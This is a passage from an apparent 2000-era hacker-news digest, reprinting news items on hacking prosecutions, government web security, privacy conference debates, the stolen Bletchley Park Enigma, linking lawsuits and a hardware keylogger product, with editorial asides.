http://www.al.com/news/mobile/Mar2000/28-a344051a.html
----------
Man faces charges of
computer hacking
03/28/2000
By CHRISTINE HAUGHNEY
Register Staff Reporter
A former Eagle Scout and son of a former Mobile
philanthropist faces federal charges for alleged computer
hacking.
Brian Michael Jacobs, 23, of Mobile was arraigned by
U.S. Magistrate Bert W. Milling Jr. last Wednesday on
charges that on May 16, 1999, he "knowingly transmitted
code and commands to the computer of an Internet
Service Provider (ISP)" which resulted in more than
$5,000 in damage. The combined charges carry up to five
years in federal prison and $250,000 in fines.
In the computer world, Jacobs assumed the code name
Blaxthos, court documents state.
A 1995 Murphy High School graduate and Eagle Scout,
Jacobs briefly attended Auburn University before leaving
in March 1996. Jacobs was convicted on state charges in
Lee County in 1996. But Ronald Myers, the former
prosecutor on the case, said that he could not comment
further on the charges because Jacobs was a youthful
offender at the time.
His father, Michael Jacobs, who had worked as executive
director of the Medical Society of Mobile County Inc.,
died in 1997.
Court documents list Jacobs as a "permanent" resident of
Miami, Fla., where he is working. But a Mobile address
also was listed in court documents.
Milling, however, released him with the requirements that
he "refrain from any use or unlawful possession of a
narcotic drug and other controlled substances" and that he
"undergo random urinalysis; also drug and alcohol
treatment as deemed appropriate."
At Wednesday's hearing, Jacobs' attorney, Arthur
Madden, mentioned a dispute with the U.S. attorney's
office about failing to provide documents it had against
Jacobs.
"The government has had eight months to get ready to do
this," Madden told Milling.
The court scheduled Jacobs' case for May.
� 2000 Mobile Register. Used with permission.
@HWA
170.0 HNN:Apr 4th:Federal Web Site Security Called Weak (Again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Members of the House cyber security team told lawmakers (again) on
Monday that government web sites have weak security. An additional
$250 million was requested to fund cyber security pilot programs at
five agencies. A request was also made to exempt cooperating companies
from the Freedom of Information Act when sharing proprietary
information with the government following a cyber attack. (Freedom
from FOIA will make absolutely no difference and will further erode
the peoples' rights.)
Governement Executive Magazine
http://www.govexec.com/dailyfed/0400/040400b1.htm
----------
April 4, 2000
DAILY BRIEFING
Federal Web site security called
weak
By Juliana Gruenwald, National Journal's Technology Daily
While many of the government's computer systems are secure,
federal agencies' Web interfaces with the public are the weakest
links, two security experts told lawmakers Monday.
Members of the House cybersecurity team and other lawmakers
toured computer security firms in Northern Virginia Monday,
including online security firm Global Integrity. Company
President Dan Wooley and William Marlow, the company's
executive vice president, also cited the need to provide
companies with some exemption from the Freedom of
Information Act to ensure that proprietary information that they
share with the government about a cyberattack is not revealed.
Reps. Tom Davis, R-Va., and James Moran, D-Va., are
expected soon to introduce a bill addressing that issue.
In the area of computer security, House cyber team leader J.C.
Watts, R-Okla., chairman of the House Republican Conference,
and four other House members sent a letter Friday to Rep.
Harold Rogers, R-Ky., chairman of the House Appropriations
Commerce, Justice and State Subcommittee, requesting that
$250 million be appropriated to fund an information security pilot
program at five agencies. The agencies include the Defense and
State Departments and the Environmental Protection Agency,
which has been criticized for its information security practices.
"Governmentwide policies for the management of programs that
support the cost-effective security of federal information
systems remain inadequate," Watts wrote along with Davis and
Reps. Pete Sessions, R-Texas, James Rogan, R-Calif., and Bill
McCollum, R-Fla.
Rep. Bob Goodlatte, R-Va., said he would like to see the Clinton
administration hold an international summit on cybersecurity. If
the administration fails to act, he suggested that Congress may
have to pass a resolution urging the president to take such an
action.
"There's a great need for greater international cooperation" on
the issue, Goodlatte said.
On the tour, Wooley said denial of service attacks and damage
to a company's reputation were the biggest potential losses for
companies when they are attacked. An employee showed a
group of lawmakers how a hacker might break into a bank Web
site and potentially steal money from an account.
@HWA
171.0 HNN:Apr 4th:Germans Propose Strike Force For Net Defense
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
A secret committee of the German government has released a study it
has been working on for two years. The study concluded that Internet
attacks will replace ground wars in the coming years. The group, which
included several government groups warned that attacks could be
targeted against military or civilian computer systems. The group also
proposed a 'strike force' to help defend critical sites. (How does a
'strike force' defend anything?)
ZD Net
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2504525,00.html?chkpt
----------
Germany eyes Web security
After almost two years of study, a secret
committee of the German government has
concluded that Internet attacks will supplant
military conflicts in the coming years, according
to German magazine "Der Spiegel." The group,
which encompasses several ministries, security
forces and the chancellorship warned that attacks
could interfere with sites belonging to the military
as well as key civil institutions such as the police,
power utilities and health services. "There is no
more national territory" that can be defended
militarily, the group reports; it went on to propose
a "strike force" within the German federal office
for security that could address attacks on critical
sites. -- Susanne Rieger, ZDNet Germany;
translation by Matthew Rothenberg, ZDNet News
@HWA
172.0 HNN:Apr 4th:New Mags are Now Available.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by chri
Issue 10 of Krash has been released. Rogue Transmission issue #3 is
now available.
Krash
Rogue Transmission
http://www.krash.org.uk
http://www.geocities.com/solidex
----------
@HWA
173.0 HNN:Apr 5th:De Beers Releases Personal Info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
adiamondisforever.com recently released the names, address, phone
numbers and e-mail of over 35,000 customers. The web site, sponsored
by De Beer's, is part of The Diamond Information Center (DIC). Site
Administrators quickly fixed the hole that allow the information to be
accessible.
C|Net
http://news.cnet.com/news/0-1007-200-1639327.html?tag
----------
@HWA
174.0 HNN:Apr 5th:CFP In Toronto
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The Tenth Computers Freedom and Privacy conference got underway
yesterday in Toronto Canada. Anonymity on the Internet is one of this
years hottest topics.
The Computers Freedom and Privacy Conference
PC World
http://www.cfp2000.org/
http://www.pcworld.com/pcwtoday/article/0,1510,16043,00.html
----------
Can Net Infrastructure
Protect Privacy?
Privacy conference panelists debate control
implications of domain name system.
by Rebecca Sykes, IDG News Service
April 4, 2000, 3:45 p.m. PT
As the world grapples with how and whether to control
the Internet, a model surfaced at the Computers,
Freedom, and Privacy conference held in Toronto this
week to let control--and individuals' civil liberties--flow
not from legislation but from the Net's infrastructure
itself.
"We're trying to use technology to build a civil-liberties
infrastructure," says Lenny Foner of the Media Lab at
Massachusetts Institute of Technology.
One sticky Internet issue with control implications is
the domain name system, which provides the
human-friendly monikers such as "Amazon.com" and
their corresponding numerical Internet Protocol
addresses.
"Whoever gets to decide who receives the names gets
to decide, in a sense, how visible" people and
companies are on the Internet, MIT's Foner says.
Currently the company most associated with the
domain name system, Network Solutions, manages
top-level domain servers, including .com, .net, and .org,
under a four-year contract awarded last November by
the U.S. Department of Commerce. The Herndon,
Virginia-based Network Solutions is not the sole
naming player in the system, but the vendor's clout is
evident from the $21 billion stock deal that VeriSign
worked out last month to acquire Network Solutions.
Thwarting the Squatters
Panelists contemplated how to confound that
near-centralized control of the Net while retaining its
operational value.
One possibility would be to permit multiple names,
Foner says. Such a move would cut into the power of
an organization to grant the name and would also
thwart "land grabs," where squatters purchase all
possible permutations of a company's name, Foner
adds.
An initial search for a specific company's Web site
using the current convention, for example, "ibm.com,"
might list multiple, dramatically different sites.
However, once the IBM site was reached, its location
could be cached on the user's computer, so that a
second query on "IBM" would quickly bring the user to
that same site, according to Foner.
But one panelist was concerned that relying on caches
was not in keeping with the way people use computers.
Increasingly, users access the Internet from many
sources, not from just their home or work PC, says
Lance Cottrell of Anonymizer.com. "People will have an
expectation that, if they've always typed in one name to
get to a place," they will always be able to use that
name, Cottrell says.
Another panelist said that a system in which names
were not unique would never pass muster with powerful
electronic commerce players.
"They're going to hate the idea that a user could type in
'AT&T' or 'British Telecom'" and not get to those
corporate sites, says Jonathan Weinberg of Wayne
State University. "Major e-commerce players are not
going to use this."
Important e-commerce companies are not the only
ones who value having unique and easily reachable
names, according to Phil Zimmermann, the creator of
the encryption software Pretty Good Privacy.
"I would like to be able to know that if I type in
'barnesandnoble.com' that I get Barnes and Noble,"
Zimmermann says.
@HWA
175.0 HNN:Apr 5th:Enigma Machine Stolen From Museum
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The Abwehr Enigma G-312 was stolen from its resting place in a glass
display case at Bletchley Park Trust on April 1st. This specific
variant of the machine is said to be one of only two known to exist.
Cryptographers around the world are hoping that this is some sort of
cruel April Fools joke and that the machine will soon be returned.
Updated Information on the Stolen Machine
Wired
http://home.cern.ch/~frode/crypto/BPAbwehr/Abwehr_theft.html
http://www.wired.com/news/politics/0,1283,35409,00.html
----------
Go to the first url for neat pics and technical data on the enigma
- Ed
Wired;
Cryptos Try to Solve Enigma Crime by Lynn Burke
3:00 a.m. Apr. 5, 2000 PDT Whoever stole the rare, World War II
secret decoder known as the Abwehr Enigma is going to have a tough time
selling it on the online black market.
That�s what cryptology enthusiasts are saying after the famous decoding
machine used during the war to protect German secret messages was taken
from its home in a glass display case at Bletchley Park Trust in London on
April 1.
"We hope that if the Internet community gets behind it, it will be
impossible to sell the machine on the public market," said Christine
Large, the trust's director.
Because the machine was stolen on April Fool's day, trust officials say
its theft may have been a prank.
"If it was just an April Fool, we hope our Abwehr Enigma turns up soon,"
Large said.
But as long as the decoder remains at large, active cryptologists who
revere the analog antique are getting the word of its disappearance out
over the Web, hoping to catch a thief who might try and sell the item
online. Leading the effort is the Crypto Simulation Group, a small
group of cryptologists who specialize in the Enigma machines.
"In addition to our normal activities in cryptologic research, we have set
up Web pages ... to broadcast to as large a base as possible the features
of this rather unique piece of historical cipher equipment in the hope
that the thieves will be caught in the act of attempting to dispose
of it," said David Hamer, one of the group's members.
Hamer, a retired historian living in New Jersey and one of the world's
foremost Enigma experts, said it's important to rescue the machine because
it is one of only two of its kind known to still exist. The other one is
housed in the National Cryptologic Museum at Fort Meade, Maryland.
According to a spokesman at the museum, 200 "G" Enigmas were issued to the
German army high command during World War II for an unknown "special
purpose." But no one seems to know where most of those have ended up,
making the stolen machine all the more valuable.
"This Abwehr Enigma is a close to unique variant," and it's likely to be
worth quite a sum of cash, Hamer said. "Even standard service Enigmas are
rare enough to command prices in the tens of thousands of dollars," he
said.
Since the announcement of the theft, several sites dedicated to cryptology
have added a link to this urgent message about the machine's theft.
Message boards have been frenetic with hundreds of postings about the
machine's theft.
The decoder, which looks like little more than an old-fashioned typewriter
with a counter above the keyboard that resembles a car odometer, was given
to the museum in 1998 by Britain's intelligence agency, the Government
Communications Headquarters.
According to the U.S. National Security Agency, cryptology was key to the
success of the Allies in World War II.
"Information from decrypted Enigma messages (not necessarily the Abwehr)
was used time after time to outmaneuver German forces," said NSA
spokeswoman Judi Emmel.
"Losing this Enigma is a significant loss to the historic record of World
War II cryptology."
@HWA
176.0 HNN:Apr 5th:Thailand Police Form Cyber Crime Panel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
A Committee for the Suppression of Computer Crimes has been formed by
the Police Information System Centre to fight crimes involving
technology including those committed on the Internet. Besides Police
officers the committee also has members from local ISPs, the National
Electronics and Computer Technology Centre (Nectec), security
profesionals and the Telephone Organization of Thailand.
News Bytes
http://www.newsbytes.com/pubNews/00/146912.html
----------
The page or story you have requested is available to subscribers only!
(Eat me. - Ed)
@HWA
177.0 HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
An official Chinese government survey quoted by China Daily revealed
that 40 percent of Chinese web sites have suffered online attacks. The
State Council Development Research Center conducted a survey of 300
Internet firms. 44 percent said that some of the information has been
tampered with and 40 percent claimed to have suffered an online
malicious attack.
Agence France Presse - via Inside China Today
http://www.insidechina.com/news.php3?id
----------
(I dunno, I couldn't find the story among that mess you try looking
for it ... -Ed :-/ )
@HWA
178.0 HNN:Apr 6th:DoubleClick Wins Privacy Award
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The Computers, Freedom, and Privacy conference being held this week in
Toronto Canada has awarded DoubleClick the prestigious corporate
invader award. Other winners included Commerce Secretary William Daley
who won the award for worst government official and credit reporting
firm Transunion received the lifetime menace award.
Computers, Freedom, and Privacy conference
Wired
http://www.cfp2000.org
http://www.wired.com/news/politics/0,1283,35432,00.html
----------
DoubleClick Wins for Losing by Declan McCullagh
3:00 a.m. Apr. 6, 2000 PDT TORONTO -- Say what you will about
liberal privacy advocates, but they sure do know how to have a good time.
Four of them dressed up as malicious characters from the Star Wars and
Austin Powers movies to hand the second annual "Big Brother" awards to
miscreant government agencies and large corporations on Wednesday evening.
The bald director of Privacy International, Simon Davies, was a
near-perfect Dr. Evil and master of ceremonies during the Computers,
Freedom, and Privacy conference.
The winner of the corporate invader award: DoubleClick, a company whose
now-legendary privacy missteps drew fire earlier this year.
Commerce Secretary William Daley won the worst government official award,
beating out the Federal Trade Commission. The Commerce Department has
hosted direct marketing conferences and oversees U.S. export controls of
encryption technology.
"We had a very tough time determining who would have the lifetime
achievement menace award," said Dave Banisar, a fellow at the Electronic
Privacy Information Center.
"To truly be a lifetime menace, you can't just be a flash in the pan.
DoubleClick has only been around for a few years."
An anonymous CFP conference-goer costumed as Star Wars' Darth Vader
accepted the award on behalf of credit reporting firm Transunion to
applause from the roughly 150-person audience.
Oddly enough, Transunion beat out the National Security Agency, which
championed the government-backdoored Clipper chip in the early 1990s and
spent decades trying to stifle academic encryption research in the United
States.
Winners of the pro-privacy Brandeis Award, named after U.S. Supreme Court
Justice Louis Brandeis, included Beth Givens of the Privacy Rights
Clearinghouse, and Richard Smith, who regularly exposes privacy violations
in consumer software products.
Previous Big Brother winners have included Microsoft and the FBI.
The CFP conference continues through Friday.
@HWA
179.0 HNN:Apr 6th:ACLU Appeals CPHack Ruling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Last weeks ruling concerning CPHack by U.S. District Judge Edward
Harrington was extremely vague and is now being appealed by the ACLU.
CPHack revealed the list of web sites blocked by Cyber Patrol as well
allowed people to circumvent its blocking capabilities. The courts
decisions prevented people from linking to the software, the ACLU is
charging that the US does not have the power to regulate the global
internet.
Copy of Judge's Order Wired
http://www.politechbot.com/cyberpatrol/final-injunction.html
http://www.wired.com/news/business/0,1367,35464,00.html
----------
@HWA
180.0 HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Macki
The Motion Picture Association of America has now filed an injunction
telling 2600 magazine what they can and can not link to via their web
site. Primarily they are no longer allowed to link to sites that host
copies of the DeCSS.
2600.com
Wired
http://www.2600.com/news/2000/0406.html
http://www.wired.com/news/politics/0,1283,35394,00.html
----------
@HWA
181.0 HNN:Apr 6th:Enigma Suspect Busted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by whitevampire
Police have arrested and released on bail an unidentified English man
for the theft of the Abwehr Enigma machine. The machine was recently
stolen from the museum at Bletchley Park Trust. It has been valued at
$150,000 but to many it is priceless. Police are still searching for
the machine itself.
More information on the Machine
Wired
Reuters - via Yahoo
http://home.cern.ch/~frode/crypto/BPAbwehr/Abwehr_theft.html
http://wired.com/news/politics/0,1283,35433,00.html
http://dailynews.yahoo.com/h/nm/20000405/od/machine_1.html
----------
@HWA
182.0 HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by darkscent
Privacy advocates and Paul George, supervisory special agent for the
Michigan bureau of the FBI faced off during the 10th Annual Computer,
Freedom & Privacy Conference in Toronto, Canada. George had quite a
few memorable things to say "There are worse things than having your
privacy violated ... like murder.", "If there is going to be a Big
Brother in the United States, it is going to be us -- the FBI", and
"In order to prevent crime, information has to be collected... if
justified."
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2522568,00.html?chkpt
----------
FBI agent: I am Big Brother
Pro-privacy groups might consider him 'the enemy,' but Paul George
counters: 'There are worse things than having your privacy violated ...
like murder.'
By Robert Lemos, ZDNet News UPDATED April 6, 2000 10:36 AM PT
TORONTO -- Can effective law enforcement and personal privacy coexist?
Law enforcement officials and privacy advocates faced off in a panel
discussion Wednesday over the issue of the trade-offs between security and
privacy at the 10th annual Computer, Freedom and Privacy 2000 Conference
in Toronto.
"There are reasons law enforcement should and does have the power to
arrest and to search," said Paul George, supervisory special agent for the
Michigan bureau of the FBI. "There are worse things than having your
privacy violated ... like murder."
George debated fiercely, but politely, with privacy advocates on the need
for privacy invasive investigative techniques -- such as wiretaps,
searches and Internet tracking -- to fight crime. In fact, recognizing
that many at the conference consider him to be "the enemy," George called
himself "the Big Brother in Michigan."
'If there is going to be a Big Brother in the United States, it is going
to be us. The FBI.' -- FBI Supervisory Special Agent Paul George
Few here doubt that privacy has been a casualty of the steady drive toward
computerization and the Internet economy.
While corporations -- such as RealNetworks Inc. (Nasdaq: RNWK),
DoubleClick (Nasdaq: DCLK), Intel Corp. (Nasdaq: INTC) and Microsoft Corp.
(Nasdaq: MSFT) -- have increasingly been taken to task for invading
citizens' privacy on the Internet, law enforcement and the government
continue to be a major worry for privacy advocates.
Surveillance on the rise Domestic surveillance is rising.
In 1999, police officers searched for individuals in the National Crime
Information Center database 2 million times daily, up from the 600,000
daily transactions averaged in 1988. Likewise, wiretaps are expected to
rise more than 300 percent in the next 10 years, according to the 2001 FBI
budget request.
The trends will only get worse, as technology lowers the barriers that
face law enforcement surveillance, said Thomas M. Cecil, a superior court
judge for the county of Sacramento, Calif. "In reality, most of what we
have is the illusion of openness. Today, we have de facto privacy policy
because we are inefficient; probing and gathering are time consuming and
expensive. That protects our privacy," he said.
Jim X. Dempsey, senior staff council for the technology-policy think tank
Center for Democracy and Technology and a member of the panel, agreed,
adding that more efficient data collection makes a privacy policy that
much more critical. "As the technical hurdles are solved, then legal
limitations need to be put in place to limit the (invasion of privacy) of
citizens," he said.
While Dempsey said he believed that privacy and citizen safety could
coexist, the FBI's George upheld the common wisdom that they cannot.
"I don't know how (others) can say that there is no price to privacy or
price to security in this equation," he said. "In order to prevent crime,
information has to be collected ... if justified."
Everyone a potential suspect? Yet, without proper regulations about
when and how data can be collected, such an assertion makes everyone a
suspect, said Jason Catlett, president of privacy information firm
Junkbusters Inc., who takes a dim view of current practices.
"It's like they are saying that we have a lot of robbers, so in order to
protect the banks -- rather than make them more secure -- they are
requiring the identity of everyone who walks in front of banks."
The FBI's George realizes where the FBI's push for more surveillance
powers puts the agency: "If there is going to be a Big Brother in the
United States, it is going to be us -- the FBI," he said.
@HWA
183.0 HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
In an effort to get even more laws passed to protect our nations
'6critical'9 infrastructure, Sen. Jon Kyl, R-Ariz. said that the
recent DDoS `` attacks contributed to a 258-point drop in the Dow
Jones Industrial Average and halted a string of three days of
consecutive record- high closes of the technology-laden Nasdaq
Composite Index.'' Kyl is currently co-sponsoring S. 2092 which will
allow national tap and trace orders for law enforcement. (Contributed?
Notice he didn'9t mention how much they contributed. Talk about a
scare tactic.)
San Francisco Chronicle
http://www.sfgate.com/cgi-bin/article.cgi?file
----------
Item Not Found
(sigh - Ed)
@HWA
184.0 HNN:Apr 6th:History of the L0pht, Part 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by nonentity
Oxblood Ruffin, from the Cult of the Dead Cow, has released the first
of a two part series that covers the formation and early history of
L0pht Heavy Industries. Many of these details have not been published
before.
National Post
http://www.nationalpost.com/financialpost.asp?f
----------
bad url
@HWA
185.0 HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Dan
The 6th Circuit Appeals Court has overturned a lower court ruling and
has concluded that the First Amendment does in fact protect computer
source code. Therefore they have remanded Peter Junger's case over
encryption exports back to the District Court for further
consideration.
6th Circuit Court Opinion
Associated Press - via World News
http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION
http://www.worldnews.com/?action
----------
@HWA
186.0 HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
Code-named Bullet and developed by ISS, this new software lets
e-commerce companies scan a Web site visitor's hard drive to see if it
is infected with Trojan horses, viruses or other malicious software
that could be passed on to the e-commerce site. Few details about the
program are available, the release date and pricing has not yet been
announced. (Are companies going to warn users before they scan them?)
CNN
http://www.cnn.com/2000/TECH/computing/04/06/scan.visitors.idg/index.html
----------
Frisking computers at the door
From...
April 6, 2000
Web posted at: 8:53 a.m. EDT (1253 GMT)
by Ellen Messmer
(IDG) -- ISS has developed an
intrusion-detection application,
code-named Bullet, that lets
e-commerce companies scan a Web site
visitor's PC to see if it is infected with
Trojan horses, such as Back Orifice, or
viruses that could be passed on to the e-commerce site.
Trojan horses let intruders seize remote control of PCs, and that could mean a
compromise of an online banking system, for example, even when the correct
user identification is employed to access the site.
"Businesses are just getting fed up with the crap
coming off the Internet," says ISS CEO Thomas
Noonan, adding that one bank is expected to
announce it is using the ISS application on its
home banking site this week.
The ISS application uses ActiveX technology to scan the laptop, and if required,
wipe out the unwanted, dangerous code. Noonan acknowledges that use of the
scanning application could touch off an invasion-of-privacy debate.
Further details about the application were not available. ISS has not announced
when the application will become generally available or how much it will cost.
@HWA
187.0 HNN:Apr 7th:Links to Web Sites Illegal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The Osaka District Court has ruled that under certain conditions
linking one web site another would violate the law. While slightly
vague it would seem that simply linking to a site that violates the
law could be charged as aiding and abetting a crime.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID
----------
Error
The Reason:
CID$B$N@_Dj$,4V0c$C$F$$^$9!#%F%s%W%l!<%H$r3NG'$7$F2<$5$(B
(Can you dig it? - Ed)
@HWA
188.0 HNN:Apr 7th:British Companies Complacent
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
A study by the Department of Trade and Industry in Britain finds that
British business are too complacent when it comes to online security.
The Information Security Breaches Survey 2000 (ISBS 2000) found that
60% of companies have suffered a security breach and that 30% do not
feel they have anything worth protecting. It was also found that the
average costs of each intrusion was only �20,000. The study will be
released at Infosecurity Europe 2000 on 11 April at Olympia in London.
The UK Register
http://www.theregister.co.uk/000406-000023.html
----------
Posted 06/04/2000 3:16pm by Tim Richardson
UK PLC leaves door open to hackers - report
British companies are too complacent when it comes to Internet security
and only have themselves to blame if their IT systems are compromised by
hackers. That's just one of the conclusions of a new survey published by
the Department of Trade and Industry (DTI) which reveals that two thirds
of companies in Britain have suffered security breaches within the last
two years.
But the survey also reports that most of the losses are under �20,000.
This is chicken-feed to mega-corporations, and many of them don't take
corrective action even after a loss, possibly because fixing the holes
would be more expensive than just accepting continuing small losses.
Of those suffering a serious security breach 64 per cent said
"nothing has changed" since the trespass occurred. Just under half
of all security breaches were due to human error.
Malcolm Skinner, Product Marketing manager, AXENT Technologies, said:
"The report indicates that, to date, businesses have been far too
complacent. "In addition to the perils of having your network or Web
site hacked, companies must think of the consequences as far as customer
trust is concerned.
Tom Perrott, Research director, Taylor Nelson Sofres said: "Although
there have been some well publicised security breaches, it is generally
accepted that those brought to the attention of the public are likely
to be the tip of the iceberg.
The key findings of ISBS 2000 show that:
+ 60 per cent of organisations have suffered a security breach in the
last two years.
+ Over 30 per cent of organisations do not recognise that their business
information is either sensitive or critical and therefore a business
asset worth protecting.
+ 82 per cent of businesses with external electronic links do not use
any firewall protection, and 59 per cent of those with a Web site do
not use Web site protection.
+ Of those organisations that have critical or sensitive information,
63 per cent had suffered a breach that was considered serious to
some degree.
+ One in three businesses are either already buying or selling over
the Internet, or intend to start in the near future.
+ Some good practices are implemented and adhered to by 83 per cent
of the organisation interviewed - eg. virus protection and password
controls.
+ Only 37 per cent of organisations interviewed have undertaken a risk
assessment where a systematic approach is taken to assess the security
risks faced by the organisation.
+ 40 per cent of companies reporting security breaches were due to
operator or user error reinforcing the fact that information security
cannot simply be solved by technology alone.
+ Nearly three quarters of organisations that suffered a breach, which
they regarded to be serious, had no contingency plan in place to deal
with it.
+ More than half of the organisations do not believe that there is
anything they could have done to prevent the most serious breaches they
have suffered.
+ Only one in seven organisations has a formal information management
security policy in place.
+ Organisations where responsibility for information security rests at
board level are those most likely to have formal policies in place.
The presence of a formal policy is one of the most important issues
in reporting and resolving security breaches.
The full findings of the DTI's Information Security Breaches Survey
2000 (ISBS 2000) will be released at Infosecurity Europe 2000 on 11
April at Olympia in London. �
@HWA
189.0 HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
In the first case of its kind in Hong Kong a teenager has been
sentenced to six months in jail after pleading guilty to 49 computer
crime-related charges. Two other accomplices where sent to detention
centers. The trio got to know each other online where they traded name
and password information on various accounts. The three have been
released on bail pending an appeal.
Agence France-Presse - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html
----------
Teen reportedly Hong Kong's first convicted Internet hacker
Copyright � 2000 Nando Media Copyright � 2000 Agence France-Press
From Time to Time: Nando's in-depth look at the 20th century
Agence France-Presse
HONG KONG (April 6, 2000 8:02 a.m. EDT http://www.nandotimes.com) - A Hong
Kong teenager has been sentenced to six months in jail for hacking into
the Internet in the first case of its kind in the territory, a report said
Thursday.
Po Yiu-ming, 19, was jailed Wednesday, while two of his companions, Tam
Hei-lun, 19, and Mak King-lam, 18, were sent to a detention center after
pleading guilty to a total of 49 computer crime-related charges, the Hong
Kong Standard reported.
It was the first case to be brought before a Hong Kong court after the
computer crime laws were enacted in 1994.
The trio -- who reportedly got to know each other through surfing the
Internet -- exchanged illegally-gained login names and passwords in order
to hack into the accounts of Internet subscribers.
Magistrate Ian Candy described the three as "intelligent" individuals who
could have developed their computer skills for good causes.
But Candy said the offenses were serious and they had to be given
custodial sentences as a deterrent to others.
The trio were released on bail of 10,000 Hong Kong dollars ($1,285)
pending appeal.
On Wednesday, a system analyst was sentenced to perform 100 hours of
community service for unlawfully retrieving tendering data from a
government computer system.
@HWA
190.0 HNN:Apr 7th:Census Afraid of Electronic Intrusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
While the US Census Bureau claims that it is doing everything it can
to increase responsiveness it has deliberately played down the online
option. The Census feels that they have not adequately tested the
security options of the site. So while the site is active and
available it is not being publicized. (It won't get broken into if we
don't tell anyone about it.)
Online Census Form
Industry Standard - via Yahoo
http://www.2000.census.gov/
http://dailynews.yahoo.com/h/is/20000406/bs/20000406103.html
----------
@HWA
191.0 HNN:Apr 7th:Hardware Key Logger Introduced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Software to monitor every key stroke has been around for a while but
now a New Zealand company has introduced a hardware device that is
small enough to be hidden inside the keyboard that does the same
thing. The small device known as KeyGhost will monitor and record
every key stroke on the keyboard and stores all data within itself.
KeyGhost will retail for between $99 and $309.
ZD Net UK
http://www.zdnet.co.uk/news/2000/12/ns-14347.html
----------
@HWA
192.0 HNN:Apr 7th:Napalm Issue 4
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Kynik
Issue 4 of Napalm has been released with articles on securing Solaris
2.x and musical intonation. (Now that's a weird mix.)
Napalm
http://napalm.firest0rm.org/
----------
Napalm is an e-zine devoted to computer security, with a healthy
dose of music, news, and ethics. We are committed to helping
people understand how to use their computers more securely, while
still enjoying the technology and not getting bogged down in
lingo. If you feel you have something to contribute, or you need
some technical help (professionally or otherwise), don't hesitate
to drop us a line.
Here's a list of topics I'd like to see covered in Napalm
eventually. Email us if you're willing to contribute on these
topics or on any other topic of your liking.
Issues
Issue 4: Securing Solaris, Just Intonation, Music (Apr 5, 2000)
Issue 4 Addendum:
sol.secure
Issue 3: HERF Guns, AI Security, C++ (Jan 31, 2000)
Issue 2: Quantum Crypto, VPNs, more gh0st.net (Dec 3, 1999)
Issue 1: Onion Routing, gh0st.net, Introduction (Sep 29, 1999)
To subscribe, send an email to napalm@firest0rm.org with a subject of SUBSCRIBE.
To unsubscribe, same as above, but with a subject of UNSUBSCRIBE.
SAMPLE COPY (Issue #1 Sept 99)
/\ /^/_ _ __ __ _|^|_ __ ___
/ \/ / _` '_ \/ _` | | '_ ` _ \
